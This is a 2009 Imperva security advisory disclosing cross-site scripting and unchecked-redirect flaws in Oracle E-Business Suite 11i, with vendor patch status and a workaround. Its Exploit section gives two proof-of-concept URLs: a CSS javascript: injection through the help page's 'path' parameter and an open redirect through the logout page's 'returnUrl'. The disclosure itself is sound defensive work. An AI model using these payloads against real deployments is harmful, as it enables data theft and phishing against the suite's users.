Security Advisory: Oracle EBS - XSS and Unchecked Redirection vulnerabilities

January 20, 2009

Background

The Oracle E-Business Suite (EBS) is a collection of business Enterprise Resource Planning, Customer Relationship Management, and Supply Chain Management applications developed by Oracle Corporation. Interaction with the client is achieved through the Apache web server, Java technology (Applets) and several other Oracle technologies. Business data is stored in the Oracle database.

Scope

Imperva’s Application Defense Center is conducting a research of various business applications in order to devise better security solutions for them. As part of the research the team has identified several XSS vulnerabilities and an unchecked redirect vulnerability.

Findings

These vulnerabilities can be exploited for stealing sensitive data and executing Phishing attacks. More specifically, data can be stolen from the users of the business suite, whether these are employees of the organization that deploys EBS or partners that access it in a self-service mode.

Exploit

Attack vector 1(XSS): http://first.imperva:8003/OA_HTML/jsp/fnd/fndhelp.jsp?lang=US&root=FND:LIBRARY&path=paros%22%20style=%22background:url(javascript:alert('Imperva')) Note that this exploit does not require the use of brackets. Attack vector 2(Unchecked Redirection): http://first.imperva:8003/OA_HTML/AppsLocalLogout.jsp?returnUrl=http://www.imperva.com

Version Tested

  • Oracle applications release 11i.

Workaround

Attack vector #1 can be eliminated if online help system is removed.

Discovered By

Guy Karlebach of Imperva ADC

Vendor Status

Patch available (CPU July 2006)
For comments and suggestions please contact adc@imperva.com

Disclaimer

The information within this advisory is subject to change without notice. Use of this information constitutes acceptance for use in an AS IS condition. Any use of this information is at the user’s own risk. There are no warranties, implied or expressed, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.

Redistribution of this alert electronically is allowed as long as it is not edited in any way. To reprint this alert, in whole or in part, in any medium other than electronic medium, adc@imperva.com for permission.